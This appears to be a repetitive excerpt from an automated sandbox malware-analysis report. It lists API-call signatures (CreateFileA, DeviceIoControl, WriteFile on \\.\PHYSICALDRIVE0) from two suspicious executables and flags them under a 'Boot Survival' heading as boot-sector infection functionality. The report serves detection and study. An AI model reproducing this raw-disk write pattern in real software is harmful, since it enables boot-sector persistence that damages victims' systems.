            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE012_2_00419EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE012_2_00419D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE013_2_001B9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE013_2_001B9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE014_2_00359EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE014_2_00359D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE015_2_00319EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE015_2_00319D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE016_2_00389EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE016_2_00389D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE017_2_00109EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE017_2_00109D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE018_2_00109EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE018_2_00109D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE019_2_00229EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE019_2_00229D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE020_2_00329EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE020_2_00329D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE021_2_00519EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE021_2_00519D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE022_2_00199EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE022_2_00199D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE023_2_00849EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE023_2_00849D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE025_2_00409EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE025_2_00409D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE026_2_00829EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE026_2_00829D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE027_2_00099EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE027_2_00099D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE029_2_005D9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE029_2_005D9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE030_2_00099EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE030_2_00099D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE031_2_00919EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE031_2_00919D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE032_2_00399EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE032_2_00399D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE033_2_00099EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE033_2_00099D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE034_2_00229EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE034_2_00229D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE035_2_00159EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE035_2_00159D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE036_2_007F9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE036_2_007F9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE037_2_00259EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE037_2_00259D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE038_2_00269EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE038_2_00269D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE039_2_003F9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE039_2_003F9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE040_2_003F9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE040_2_003F9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE041_2_00289EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE041_2_00289D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE042_2_00109EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE042_2_00109D90

            Boot Survival

            barindex
            Contains functionality to infect the boot sector
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE04_2_00369EC0
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE04_2_00369D90
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE04_2_00409EC0
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE04_2_00409D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE09_2_003D9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE09_2_003D9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE010_2_00189EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE010_2_00189D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE011_2_00389EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE011_2_00389D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE012_2_00419EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE012_2_00419D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE013_2_001B9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE013_2_001B9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE014_2_00359EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE014_2_00359D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE015_2_00319EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE015_2_00319D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE016_2_00389EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE016_2_00389D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE017_2_00109EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE017_2_00109D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE018_2_00109EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE018_2_00109D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE019_2_00229EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE019_2_00229D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE020_2_00329EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE020_2_00329D90
